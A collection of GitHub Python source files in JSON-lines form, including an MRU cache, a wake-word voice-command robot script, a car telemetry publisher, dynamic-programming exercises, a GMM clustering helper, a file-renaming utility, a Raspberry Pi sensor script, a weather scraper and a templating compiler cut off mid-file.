data from BaseCaching parent class\n \"\"\"\n self.recently_used = []\n super().__init__()\n\n def put(self, key, item):\n \"\"\"\n store data in cache. manage memory with mru\n algorithm\n \"\"\"\n if key is None or item is None:\n return\n self.cache_data[key] = item\n if len(self.cache_data) > BaseCaching.MAX_ITEMS:\n recent_key = \"\"\n if len(self.recently_used) == 0:\n recent_key = list(self.cache_data.keys())[-2]\n else:\n recent_key = self.recently_used[-1]\n del self.cache_data[recent_key]\n print(f\"DISCARD: {recent_key}\")\n if len(self.recently_used) > 0:\n self.recently_used.pop()\n\n def get(self, key):\n \"\"\"\n retrieve data from cache\n \"\"\"\n if key is None or key not in self.cache_data:\n return None\n self.recently_used = []\n self.recently_used.append(key)\n return self.cache_data[key]\n","repo_name":"kaytee07/alx-backend","sub_path":"0x01-caching/4-mru_cache.py","file_name":"4-mru_cache.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"15095158762","text":"import argparse\nimport os\nimport struct\nimport wave\nfrom datetime import datetime\nfrom threading import Thread\n\nimport pvporcupine\nfrom pvrecorder import PvRecorder\nimport tensorflow as tf\nimport os\nimport requests\n#import matplotlib.pyplot as plt\nfrom tensorflow import keras \ncommands= ['stop','up', 'yes', 'no' ,'right' ,'down', 'go', 'left']\n\ndef get_label(file_path):\n parts = tf.strings.split(\n input=file_path,\n sep=os.path.sep)\n # Note: You'll use indexing here instead of tuple unpacking to enable this\n # to work in a TensorFlow graph.\n return ''\ndef get_spectrogram(waveform):\n # Zero-padding for an audio waveform with less than 16,000 samples.\n input_len = 16000\n waveform = waveform[:input_len]\n zero_padding = tf.zeros(\n [len(waveform)] - tf.shape(waveform),\n dtype=tf.float32)\n # Cast the waveform tensors' dtype to float32.\n waveform = tf.cast(waveform, dtype=tf.float32)\n # Concatenate the waveform with `zero_padding`, which ensures all audio\n # clips are of the same length.\n equal_length = tf.concat([waveform, zero_padding], 0)\n # Convert the waveform to a spectrogram via a STFT.\n spectrogram = tf.signal.stft(\n equal_length, frame_length=255, frame_step=128)\n # Obtain the magnitude of the STFT.\n spectrogram = tf.abs(spectrogram)\n # Add a `channels` dimension, so that the spectrogram can be used\n # as image-like input data with convolution layers (which expect\n # shape (`batch_size`, `height`, `width`, `channels`).\n spectrogram = spectrogram[..., tf.newaxis]\n return spectrogram\n\ndef decode_audio(audio_binary):\n # Decode WAV-encoded audio files to `float32` tensors, normalized\n # to the [-1.0, 1.0] range. Return `float32` audio and a sample rate.\n audio, _ = tf.audio.decode_wav(contents=audio_binary)\n # Since all the data is single channel (mono), drop the `channels`\n # axis from the array.\n return tf.squeeze(audio, axis=-1)\n\nAUTOTUNE = tf.data.AUTOTUNE\ndef get_spectrogram_and_label_id(audio, label):\n spectrogram = get_spectrogram(audio)\n label_id = tf.argmax(label == commands)\n return spectrogram, label_id\n\ndef get_waveform_and_label(file_path):\n label = get_label(file_path)\n audio_binary = tf.io.read_file(file_path)\n waveform = decode_audio(audio_binary)\n return waveform, label\n\ndef preprocess_dataset(files):\n files_ds = tf.data.Dataset.from_tensor_slices(files)\n output_ds = files_ds.map(\n map_func=get_waveform_and_label,\n num_parallel_calls=AUTOTUNE)\n output_ds = output_ds.map(\n map_func=get_spectrogram_and_label_id,\n num_parallel_calls=AUTOTUNE)\n return output_ds\n\nimport sounddevice as sd\nimport wavio as wv\nimport struct\nimport wave\nfs = 16000 # Sample rate\nseconds = 1 # Duration of recording\n\n\n\n\n \n\n\nclass PorcupineDemo(Thread):\n \"\"\"\n Microphone Demo for Porcupine wake word engine. It creates an input audio stream from a microphone, monitors it, and\n upon detecting the specified wake word(s) prints the detection time and wake word on console. It optionally saves\n the recorded audio into a file for further debugging.\n \"\"\"\n\n def __init__(\n self,\n access_key,\n library_path,\n model_path,\n keyword_paths,\n sensitivities,\n input_device_index=None,\n output_path=None):\n\n \"\"\"\n Constructor.\n :param library_path: Absolute path to Porcupine's dynamic library.\n :param model_path: Absolute path to the file containing model parameters.\n :param keyword_paths: Absolute paths to keyword model files.\n :param sensitivities: Sensitivities for detecting keywords. Each value should be a number within [0, 1]. A\n higher sensitivity results in fewer misses at the cost of increasing the false alarm rate. If not set 0.5 will\n be used.\n :param input_device_index: Optional argument. If provided, audio is recorded from this input device. Otherwise,\n the default audio input device is used.\n :param output_path: If provided recorded audio will be stored in this location at the end of the run.\n \"\"\"\n\n super(PorcupineDemo, self).__init__()\n\n self._access_key = access_key\n self._library_path = library_path\n self._model_path = model_path\n self._keyword_paths = keyword_paths\n self._sensitivities = sensitivities\n self._input_device_index = input_device_index\n\n self._output_path = output_path\n\n def run(self):\n \"\"\"\n Creates an input audio stream, instantiates an instance of Porcupine object, and monitors the audio stream for\n occurrences of the wake word(s). It prints the time of detection for each occurrence and the wake word.\n \"\"\"\n\n keywords = list()\n for x in self._keyword_paths:\n keyword_phrase_part = os.path.basename(x).replace('.ppn', '').split('_')\n if len(keyword_phrase_part) > 6:\n keywords.append(' '.join(keyword_phrase_part[0:-6]))\n else:\n keywords.append(keyword_phrase_part[0])\n\n porcupine = None\n recorder = None\n wav_file = None\n try:\n porcupine = pvporcupine.create(\n access_key=self._access_key,\n library_path=self._library_path,\n model_path=self._model_path,\n keyword_paths=self._keyword_paths,\n sensitivities=self._sensitivities)\n\n recorder = PvRecorder(device_index=self._input_device_index, frame_length=porcupine.frame_length)\n recorder.start()\n\n if self._output_path is not None:\n wav_file = wave.open(self._output_path, \"w\")\n wav_file.setparams((1, 2, 16000, 512, \"NONE\", \"NONE\"))\n\n print(f'Using device: {recorder.selected_device}')\n\n print('Listening {')\n for keyword, sensitivity in zip(keywords, self._sensitivities):\n print(' %s (%.2f)' % (keyword, sensitivity))\n print('}')\n\n while True:\n pcm = recorder.read()\n\n if wav_file is not None:\n wav_file.writeframes(struct.pack(\"h\" * len(pcm), *pcm))\n\n result = porcupine.process(pcm)\n if result >= 0:\n import pygame\n pygame.init()\n pygame.mixer.music.load(\"1.mp3\")\n pygame.mixer.music.play(-1)\n pygame.mixer.music.stop()\n response = requests.get(\"http://192.168.145.131:5000/api/picovoice\")\n if response.text != \"sleep\":\n recorder.stop()\n print(\"start\")\n myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=1, dtype='int16')\n sd.wait() # Wait until recording is finished\n print(\"finish\")\n wv.write(\"output.wav\", myrecording, fs, sampwidth=2)\n sample_file1 = 'output.wav'\n import numpy as np\n sample_ds = preprocess_dataset([str(sample_file1)])\n reconstructed_model = keras.models.load_model(\"model-final.h5\")\n for spectrogram, label in sample_ds.batch(1):\n prediction = reconstructed_model(spectrogram)\n counter = 0\n max_arg = 0\n max_val = -9999\n for i in prediction[0]:\n co = 1\n if counter == 2:\n co = .6 \n if i*co > max_val:\n max_arg = counter\n max_val = i*co\n counter = counter + 1\n print(commands[max_arg])\n requests.get(\"http://192.168.145.131:5000/api/\" + commands[max_arg])\n recorder.start()\n\n\n\n except KeyboardInterrupt:\n print('Stopping ...')\n finally:\n if porcupine is not None:\n porcupine.delete()\n\n if recorder is not None:\n recorder.delete()\n\n if wav_file is not None:\n wav_file.close()\n\n @classmethod\n def show_audio_devices(cls):\n devices = PvRecorder.get_audio_devices()\n\n for i in range(len(devices)):\n print(f'index: {i}, device name: {devices[i]}')\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--access_key',\n help='AccessKey obtained from Picovoice Console (https://picovoice.ai/console/)')\n\n parser.add_argument(\n '--keywords',\n nargs='+',\n help='List of default keywords for detection. Available keywords: %s' % ', '.join(sorted(pvporcupine.KEYWORDS)),\n choices=sorted(pvporcupine.KEYWORDS),\n metavar='')\n\n parser.add_argument(\n '--keyword_paths',\n nargs='+',\n help=\"Absolute paths to keyword model files. If not set it will be populated from `--keywords` argument\")\n\n parser.add_argument('--library_path', help='Absolute path to dynamic library.', default=pvporcupine.LIBRARY_PATH)\n\n parser.add_argument(\n '--model_path',\n help='Absolute path to the file containing model parameters.',\n default=pvporcupine.MODEL_PATH)\n\n parser.add_argument(\n '--sensitivities',\n nargs='+',\n help=\"Sensitivities for detecting keywords. Each value should be a number within [0, 1]. A higher \" +\n \"sensitivity results in fewer misses at the cost of increasing the false alarm rate. If not set 0.5 \" +\n \"will be used.\",\n type=float,\n default=None)\n\n parser.add_argument('--audio_device_index', help='Index of input audio device.', type=int, default=-1)\n\n parser.add_argument('--output_path', help='Absolute path to recorded audio for debugging.', default=None)\n\n parser.add_argument('--show_audio_devices', action='store_true')\n\n args = parser.parse_args()\n\n if args.show_audio_devices:\n PorcupineDemo.show_audio_devices()\n else:\n if args.access_key is None:\n raise ValueError(\"AccessKey (--access_key) is required\")\n if args.keyword_paths is None:\n if args.keywords is None:\n raise ValueError(\"Either `--keywords` or `--keyword_paths` must be set.\")\n\n keyword_paths = [pvporcupine.KEYWORD_PATHS[x] for x in args.keywords]\n else:\n keyword_paths = args.keyword_paths\n\n if args.sensitivities is None:\n args.sensitivities = [0.5] * len(keyword_paths)\n\n if len(keyword_paths) != len(args.sensitivities):\n raise ValueError('Number of keywords does not match the number of sensitivities.')\n\n PorcupineDemo(\n access_key=args.access_key,\n library_path=args.library_path,\n model_path=args.model_path,\n keyword_paths=keyword_paths,\n sensitivities=args.sensitivities,\n output_path=args.output_path,\n input_device_index=args.audio_device_index).run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MohammadJRanjbar/Social-robots-an-open-source-framework-for-personal-assistant-robots","sub_path":"Robot/voice_detection.py","file_name":"voice_detection.py","file_ext":"py","file_size_in_byte":11333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28251103933","text":"import time\nimport pika\nimport logging\nimport broker\n\nfrom car import Car\n\nINTERVAL_SEC = 1.0\n\n\ndef send_scheduler(car: Car):\n while True:\n try:\n with broker.get_channel() as channel:\n # sleep na sterydach -> https://stackoverflow.com/a/54161792/7598740\n cptr = 0\n time_start = time.time()\n time_init = time.time()\n while True:\n try:\n car.fill_timestamp(time.time_ns() // 1_000_000)\n finalMessage = car.to_bytes()\n channel.basic_publish(\n \"amq.direct\",\n \"car\",\n finalMessage,\n pika.BasicProperties(\n delivery_mode=pika.DeliveryMode.Persistent\n )\n )\n car.reset()\n logging.info(\"[Send Scheduler] Messsage sent to broker\")\n except Exception as e:\n logging.warning(f\"Failed creating final message: \" + str(e))\n cptr += 1\n time_start = time.time()\n time.sleep(((time_init + (INTERVAL_SEC * cptr)) - time_start ))\n except:\n logging.warning(\"Broker connection can't be established\")\n time.sleep(0)\n","repo_name":"LodzSolarTeam/LST_Can_Hub","sub_path":"send_scheduler.py","file_name":"send_scheduler.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"29335176790","text":"# coding=utf-8\n# author huxh\n# time 2020/3/21 10:57 AM\n\n# 动态规划 自顶向下\ndef cuttingRope(n):\n d = {}\n\n def back(n):\n if n == 2:\n return 1\n if n in d:\n return d[n]\n\n res = -1\n for i in range(1, n):\n res = max(res, max(i * (n - i), i * back(n - i)))\n d[n] = res\n return res\n return back(n)\n\n# 动态规划 自底向上\ndef cuttingRope2(n):\n dp = [0] * (n + 1)\n\n dp[2] = 1\n for i in range(3, n):\n for j in range(i):\n dp[i] = max(dp[i], max((i - j) * j, j * dp[i - j]))\n return dp[-1]\n\n# 动态规划 优化\ndef cuttingRope3(n):\n dp = [0, 1, 1]\n\n for i in range(3, n + 1):\n dp[i % 3] = max(max(dp[(i - 1) % 3], i - 1),\n 2 * max(dp[(i - 2) % 3], i - 2),\n 3 * max(dp[(i - 3) % 3], i - 3))\n return dp[n % 3]\n\n# 找规律\ndef cuttingRope4(n):\n if n <= 3:\n return n - 1\n a, b = n // 3, n % 3\n if b == 0:\n return pow(3, a)\n if b == 1:\n return pow(3, a - 1) * 4\n return pow(3, a) * 2\n","repo_name":"Huxhh/LeetCodePy","sub_path":"jianzhioffer/14_1CuttingRope.py","file_name":"14_1CuttingRope.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26081699716","text":"#!/usr/bin/env python\nimport io\nimport sys, os\nsys.path.append(os.getcwd())\n\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.mixture import GaussianMixture\nfrom itertools import chain, compress, zip_longest\nfrom matplotlib.patches import Ellipse\n\nimport algo_factory\n \n# GMM algo parameters (sklearn.mixture.GaussianMixture)\n# n_components=1, // The number of mixture components.\n# covariance_type='full' // The number of mixture components. Options are: {‘full’ (default), ‘tied’, ‘diag’, ‘spherical’}.\n# tol=0.001 // The convergence threshold. EM iterations will stop when the lower bound average gain is below this threshold.\n# reg_covar=1e-06 // Non-negative regularization added to the diagonal of covariance. Allows to assure that the covariance matrices are all positive.\n# max_iter=100 // The number of EM iterations to perform.\n# n_init=1 // The number of initializations to perform. The best results are kept.\n# init_params='kmeans' // The method used to initialize the weights, the means and the precisions. Must be one of:\n# 1) 'kmeans' : responsibilities are initialized using kmeans\n# 2) 'random' : responsibilities are initialized randomly.\n# weights_init=None // The user-provided initial weights, defaults to None. If it None, weights are initialized using the init_params method.\n# means_init=None // The user-provided initial means, defaults to None, If it None, means are initialized using the init_params method.\n# precisions_init=None // The user-provided initial precisions (inverse of the covariance matrices), defaults to None.\n# If it None, precisions are initialized using the ‘init_params’ method. The shape depends on ‘covariance_type’:\n# (n_components,) if 'spherical',\n# (n_features, n_features) if 'tied',\n# (n_components, n_features) if 'diag',\n# (n_components, n_features, n_features) if 'full'\n# random_state=None // Controls the random seed given to the method chosen to initialize the parameters (see init_params).\n# In addition, it controls the generation of random samples from the fitted distribution (see the method sample).\n# Pass an int for reproducible output across multiple function calls.\n# warm_start=False // If ‘warm_start’ is True, the solution of the last fitting is used as initialization for the next call of fit().\n# This can speed up convergence when fit is called several times on similar problems.\n# In that case, ‘n_init’ is ignored and only a single initialization occurs upon the first call.\n# verbose=0 // Enable verbose output. If 1 then it prints the current initialization and each iteration step.\n# If greater than 1 then it prints also the log probability and the time needed for each step.\n# verbose_interval=10 // Number of iteration done before the next print.\n\nclass GMMAlgo:\n def __init__(self, n_components, covariance_type, tol, reg_covar, max_iter, n_init, init_params, weights_init, means_init,\n precisions_init, random_state, warm_start, verbose, verbose_interval):\n self.n_components = n_components\n self.covariance_type = covariance_type\n self.tol = tol\n self.reg_covar = reg_covar\n self.max_iter = max_iter\n self.n_init = n_init\n self.init_params = init_params\n self.weights_init = weights_init\n self.means_init = means_init\n self.precisions_init = precisions_init\n self.random_state = random_state\n self.warm_start = warm_start\n self.verbose = verbose\n self.verbose_interval = verbose_interval\n\n # implementation of the algorithm, the argument are mandatory even if not used\n def start(self, data, weigths, nclusters, axis, figure=None):\n model = GaussianMixture(n_components=nclusters)\n\n # fit GM object to data\n model.fit(data)\n cluster_center = model.means_\n\n # draw ellipses\n self.addEllipse(axis, model.means_, model.covariances_, model.weights_)\n\n print(\"###################################################\")\n print(\"# Results of Gaussian Mixture clustering analysis #\")\n print(\"###################################################\")\n for i in range(len(cluster_center)):\n print(\"Cluster\",i,\"with center (x,y)=(\",cluster_center[i][0],\",\",cluster_center[i][1],\")\")\n print(\"###################################################\")\n \n\n def addEllipse(self, axis, mean, cov, weight):\n w_factor = 0.2 / weight.max()\n for pos, covar, w in zip(mean, cov, weight):\n self.draw_ellipse(pos, covar, axis, color=\"red\", alpha=w * w_factor)\n\n def draw_ellipse(self, position, covariance, axis, **kwargs):\n # Convert covariance to principal axes\n if covariance.shape == (2, 2):\n U, s, Vt = np.linalg.svd(covariance)\n angle = np.degrees(np.arctan2(U[1, 0], U[0, 0]))\n width, height = 2 * np.sqrt(s)\n else:\n angle = 0\n width, height = 2 * np.sqrt(covariance)\n\n # Draw the Ellipse\n for nsig in range(1, 4):\n axis.add_patch(Ellipse(position, nsig * width, nsig * height,\n angle, **kwargs))\n\n \nclass GMMAlgoBuilder:\n def __init__(self):\n self._instance = None\n\n def __call__(self, n_components=1, covariance_type='full', tol=0.001, reg_covar=1e-06, max_iter=100, n_init=1, init_params='kmeans',\n weights_init=None, means_init=None, precisions_init=None, random_state=None, warm_start=False, verbose=0, verbose_interval=10, **_ignored):\n if not self._instance:\n self._instance = GMMAlgo(n_components, covariance_type, tol, reg_covar, max_iter, n_init, init_params, weights_init, means_init,\n precisions_init, random_state, warm_start, verbose, verbose_interval)\n return self._instance\n\n","repo_name":"FRIBDAQ/SpecTcl","sub_path":"main/PyQtGUI/gui/gmm_creator.py","file_name":"gmm_creator.py","file_ext":"py","file_size_in_byte":6335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"21148210120","text":"#This script asks for a directory and then adds a pre or suffix to each filename in that directory.\n\nimport os\n\n#https://stackoverflow.com/questions/9727673/list-directory-tree-structure-in-python\nfor root, dirs, files in os.walk('.'):\n\tlevel = root.replace('.', '').count(os.sep)\n\tindent = ' ' * 4 * (level)\n\tprint('{}{}/'.format(indent, os.path.basename(root)))\n\tsubindent = ' ' * 4 * (level + 1)\n\tfor f in files:\n\t\tprint('{}{}'.format(subindent, f))\n\nwhile True:\n\tprint('')\n\tprint('The target needs to be a directory and the input needs to be given relative to the directory which this script is in.')\n\tprint('The current directory is \"'+os.getcwd()+'\\\\\".')\n\ttarget='.\\\\'+input('Name target directory: ')\n\tprint('Target is: \"'+target+'\".')\n\t\n\tif os.path.isdir(target):\n\t\tbreak\n\telse:\n\t\tprint('Not a directory.')\n\nwhile True:\n\tprint('')\n\tPreOrSuf=input('Do you want a prefix or a suffix? Anwser \"pre\" or \"suf\":').lower()\n\t\n\tif (PreOrSuf=='pre' or PreOrSuf=='suf') and (input('Anwser is \"'+PreOrSuf+'\". Correct? (Y/N): ')=='Y'):\n\t\tbreak\n\nif PreOrSuf=='suf':\n\twhile True:\n\t\tprint('')\n\t\tKeepExt=input('Do you want to keep the file extention? (Y/N): ')\n\t\t\n\t\tif (KeepExt=='Y' or KeepExt=='N') and (input('Anwser is \"'+KeepExt+'\". Correct? (Y/N): ')=='Y'):\n\t\t\tbreak\n\nwhile True:\n\tprint('')\n\ttext=input('What should the '+PreOrSuf+'fix be?: ')\n\t\n\tif input('The '+PreOrSuf+'fix is \"'+text+'\". Correct? (Y/N): ')=='Y':\n\t\tbreak\n\nfor filename in os.listdir(target):\n\t#https://stackoverflow.com/questions/2759067/rename-multiple-files-in-a-directory-in-python\n\t#https://stackoverflow.com/questions/225735/batch-renaming-of-files-in-a-directory\n\tif PreOrSuf=='pre':\n\t\tos.rename(os.path.join(target, filename), os.path.join(target,text+filename))\n\telif PreOrSuf=='suf' and KeepExt=='Y':\n\t\tExt=os.path.splitext(os.path.join(target, filename))[1]#https://stackoverflow.com/questions/541390/extracting-extension-from-filename-in-python\n\t\tos.rename(os.path.join(target, filename), os.path.join(target,filename[:-len(Ext)]+text+Ext))\n\telif PreOrSuf=='suf' and KeepExt=='N':\n\t\tExt=os.path.splitext(os.path.join(target, filename))[1]\n\t\tos.rename(os.path.join(target, filename), os.path.join(target,filename[:-len(Ext)]+text))\n\nprint('Done.')\n","repo_name":"TimHeiszwolf/Heis_Python_Tools","sub_path":"PreSufFix.py","file_name":"PreSufFix.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"13204588925","text":"#!/usr/bin/python3\nimport sys\n\nlines = sys.stdin.readlines()\n# print(lines)\n# print(len(lines))\n\n# curr_i = 0\n# curr_j = 0\n# temp_ans = 0\n\ncurr_i, curr_j = 0, 0\ntemp_ans = 0\nstep = 2\nflag = True\n\nfor k in range(0, len(lines), step):\n # print(lines[k])\n # print(lines[k+1])\n val1 = int(lines[k].strip().split()[3])\n val2 = int(lines[k+1].strip().split()[3])\n # print([val1, val2])\n\n item_list = lines[k+1].strip().split()\n i = (int)(item_list[0])\n j = (int)(item_list[1])\n pos = (int)(item_list[2])\n value = (int)(item_list[3])\n\n # print([i,j,pos,value])\n\n # i, j, pos, val = list(map(int,lines[k+1].strip().split()))\n\n if (i == curr_i and j == curr_j):\n temp_ans += val1*val2\n else:\n if (flag == True):\n print(temp_ans, end=\"\")\n flag = False\n else:\n print(\" \", end = \"\")\n print(temp_ans, end = \"\")\n # print(temp_ans, end = \" \")\n temp_ans = 0\n temp_ans = val1*val2\n if i != curr_i:\n flag = True\n c = 0\n print()\n curr_i, curr_j = i, j\nif (flag == True):\n print(temp_ans, end=\"\")\nelse:\n print(\" \", end = \"\")\n print(temp_ans, end=\"\")\n# print(temp_ans)\n","repo_name":"RajaSudipta/Distributed-Systems-S23CS3.401-DS-IIITH","sub_path":"Assignments/A2/q2/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"73115858295","text":"#!/usr/bin/python3\n\n''' Task 8.1D - Raspberry Pi I2C\n\n Student ID: 219011171\n Student Name: Peter Stacey\n'''\n\nfrom signal import signal, SIGTERM, SIGHUP, pause\nfrom time import sleep\nfrom threading import Thread\nfrom gpiozero import DistanceSensor\nfrom rpi_lcd import LCD\n\n\nrunning = True\nmessage = \"\"\n\nlcd = LCD()\nsensor = DistanceSensor(echo=20, trigger=21)\n\ndef safe_exit():\n exit(1)\n\ndef read_distance():\n global message\n while running:\n message = f'Distance: {sensor.value:1.2f} m'\n print(message)\n sleep(0.1)\n\ndef update_display():\n global message\n while running:\n lcd.text(message, 1)\n sleep(0.25)\n\ndef main():\n try:\n signal(SIGTERM, safe_exit)\n signal(SIGHUP, safe_exit)\n reader = Thread(target=read_distance, daemon=True)\n display = Thread(target=update_display, daemon=True)\n reader.start()\n display.start()\n pause()\n except KeyboardInterrupt:\n pass\n finally:\n global running\n running = False\n reader.join()\n display.join()\n lcd.clear()\n sensor.close()\n\nif __name__ == '__main__':\n main()\n ","repo_name":"pscompsci/SIT210_Embedded_Programming","sub_path":"Task_8_1D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"75072045175","text":"class Node:\r\n def __init__(self, data):\r\n self.left = None\r\n self.data = data # self.data = None because create an object at a time None arguments passed in constructor\r\n self.right = None\r\n\r\n def createTree(self, val):\r\n if self.data is None:\r\n self.data = val\r\n return\r\n\r\n elif self.data == val:\r\n return\r\n\r\n elif self.data > val:\r\n if self.left:\r\n self.left.createTree(val) # the address of self.left transfer to self !\r\n else:\r\n self.left = Node(val)\r\n\r\n elif self.data < val:\r\n if self.right:\r\n self.right.createTree(val) # the address of self.right transfer to self !\r\n else:\r\n self.right = Node(val)\r\n\r\n # Level-Order-Traversal (In use BFS(Breadth First Search))\r\n def levelOrder(self):\r\n self.level = 1 # declare a level of tree\r\n Queue = [] # here, it is Queue\r\n Queue.append(self) # Queue is stored first root node address at 0 index\r\n Queue.append(None) # Queue is stored is None at 1 index ---> [self,None]\r\n\r\n while Queue != []: # here, it is check your queue is empty or not\r\n key = Queue.pop(0) # here, it's remove element at index 0 and to store a key variable\r\n if key is not None: # here, it's key is not None because key is stored a root address\r\n print(f\"Level - {self.level} => {key.data}\")\r\n\r\n if key.left is not None:\r\n Queue.append(key.left)\r\n if key.right is not None:\r\n Queue.append(key.right)\r\n\r\n else:\r\n print() # here, it's used to newline\r\n self.level += 1\r\n if Queue == []: # here, it's Queue is none as --- []\r\n break\r\n else:\r\n Queue.append(None) # here, it's Queue is stored is None ---> [None]\r\n\r\n\r\nif __name__ == \"__main__\":\r\n Queue = []\r\n root = Node(None)\r\n while True:\r\n num = int(input(\"\\n Enter the node into Tree : \"))\r\n if num < 0:\r\n break\r\n else:\r\n root.createTree(num)\r\n root.levelOrder()\r\n\r\n''' Here, it is Called Breadth First Search (BFS) Algorithms in used Tree '''\r\n\r\n# ---------------- Written By : - Aditya Pratap Singh ------------------\r\n","repo_name":"git-aditya-pratap-singh/Data-Structure-with-Python","sub_path":"Tree/Level-Order-Traversal.py","file_name":"Level-Order-Traversal.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"39178126027","text":"#coding:utf-8\n\n# 3种抓取网页数据的方法: re, BeautifulSoup,lxml\n\n\n# 链接爬虫添加缓存支持\n\nclass Downloader(object):\n\t\"\"\"docstring for Downloader\"\"\"\n\tdef __init__(self, delay=5,\n\t\tuser_agent=\"wswp\",proxies=None,\n\t\tnumRetries=1,cache=None):\n\n\t\tsuper(Downloader, self).__init__()\n\t\tself.throttle = Throttle(delay)\n\t\tself.user_agent = user_agent\n\t\tself.proxies = proxies\n\t\tself.numRetries = numRetries\n\t\tself.cache = cache\n\n\tdef __call__(self):\n\t\tresult = None\n\t\tif self.cache:\n\t\t\ttry:\n\t\t\t\tresult = self.cache[url]\n\t\t\texcept KeyError as e:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tif self.numRetries >0 and 500<= result['code'] <600:\n\t\t\t\t\tresult = None\n\n\t\tif result is None:\n\t\t\tself.throttle.wait(url)\n\n\n\t\t","repo_name":"wudibbs-gcl/crawling","sub_path":"test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25536807937","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\nsend_url = \"http://api.ipstack.com/check?access_key={<key>}\"\ngeo_req = requests.get(send_url)\ngeo_json = json.loads(geo_req.text)\ncity = geo_json['city']\n\nprint(city)\n\n# creating url and requests instance\nurl = \"https://www.google.com/search?hl=en&q=\"+\"weather\"+city+\"&oq=\"+\"weather\"+city\nhtml = requests.get(url).content\n \n# getting raw data\nsoup = BeautifulSoup(html, 'html.parser')\ntemp = soup.find('div', attrs={'class': 'BNeawe iBp4i AP7Wnd'}).text\nstr = soup.find('div', attrs={'class': 'BNeawe tAd8D AP7Wnd'}).text\n \n# formatting data\ndata = str.split('\\n')\ntime = data[0]\nsky = data[1]\n \n# getting all div tag\nlistdiv = soup.findAll('div', attrs={'class': 'BNeawe s3v9rd AP7Wnd'})\nstrd = listdiv[5].text\n \n# getting other required data\npos = strd.find('Wind')\nother_data = strd[pos:]\n \n# printing all data\nprint(\"Temperature is\", temp)\nprint(\"Time: \", time)\nprint(\"Sky Description: \", sky)","repo_name":"NishantNepal1/musicRecommendationusingMetadata","sub_path":"spotifyScraper/weatherTime.py","file_name":"weatherTime.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"11080737177","text":"\"\"\"\nShopping List Calculator I\n\"\"\"\n\n# Create five variables,\n# set them to strings that represent 5 common shopping list items\n\n\nitem_name_1 = \"almond milk\"\nitem_name_2 = \"coffee\"\nitem_name_3 = \"bananas\"\nitem_name_4 = \"oatmeal\"\nitem_name_5 = \"eggs\"\n\n# Create five more variables,\n# set them to floats that represent the prices of each of the items above\n\nitem_price_1 = 3.50\nitem_price_2 = 9.00\nitem_price_3 = 2.50\nitem_price_4 = 4.00\nitem_price_5 = 2.50\n\n# Create five more variables,\n# set them to ints that represent the quantity of each of the items above\nitem_quant_1 = 1\nitem_quant_2 = 1\nitem_quant_3 = 6\nitem_quant_4 = 1\nitem_quant_5 = 12\n\n# Print to the console the name and price of each item defined above as follows:\n# 1 Coco Puffs = $8.95.\n# where:\n# 1 would be item_quant_1\n# Coco Puffs would be item_name_1\n# 8.95 would be item_name_2\n\nprint(f\"{item_quant_1} {item_name_1} is ${item_price_1}.\")\nprint(f\"{item_quant_2} {item_name_2} is ${item_price_2}.\")\nprint(f\"{item_quant_3} {item_name_3} is ${item_price_3}.\")\nprint(f\"{item_quant_4} {item_name_4} is ${item_price_4}.\")\nprint(f\"{item_quant_5} {item_name_5} is ${item_price_5}.\")\n","repo_name":"melissaarliss/python-course","sub_path":"hw/hw-1/pset_basic_data_types/shopping_list/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7016510409","text":"from enum import Enum\n\nimport sys\nimport os\n\n\nclass TempliteCompiler:\n class State(Enum):\n TEXT = 1\n CONTROL = 2\n VARIABLE = 3\n\n def __init__(self, source: str, encoding: str):\n self.blocks = [f\"# -*- coding: {encoding} -*-\"]\n self.block = \"\"\n self.source = source\n self.cursor = 0\n self.offset = 0\n\n def processText(self):\n self.block = self.block.replace(\"\\\\\", \"\\\\\\\\\").replace('\"', '\\\\\"')\n self.block = \"\\t\" * self.offset + f'write(\"\"\"{self.block}\"\"\")'\n self.blocks.append(self.block)\n self.block = \"\"\n\n def getLine(self):\n return self.source[: self.cursor].count(\"\\n\") + 1\n\n def controlIsEnding(self):\n block_stripped = self.block.lstrip()\n if block_stripped.startswith(\":\"):\n if not self.offset:\n raise SyntaxError(\n f\"Line: {self.getLine()}, no statement to terminate: `{block_stripped}`\"\n )\n self.offset -= 1\n self.block = block_stripped[1:]\n if not self.block.endswith(\":\"):\n return True\n return False\n\n def processControl(self):\n self.block = self.block.rstrip()\n\n if self.controlIsEnding():\n self.block = \"\"\n return\n\n lines = self.block.splitlines()\n margin = min(len(line) - len(line.lstrip()) for line in lines if line.strip())\n self.block = \"\\n\".join(\"\\t\" * self.offset + line[margin:] for line in lines)\n self.blocks.append(self.block)\n if 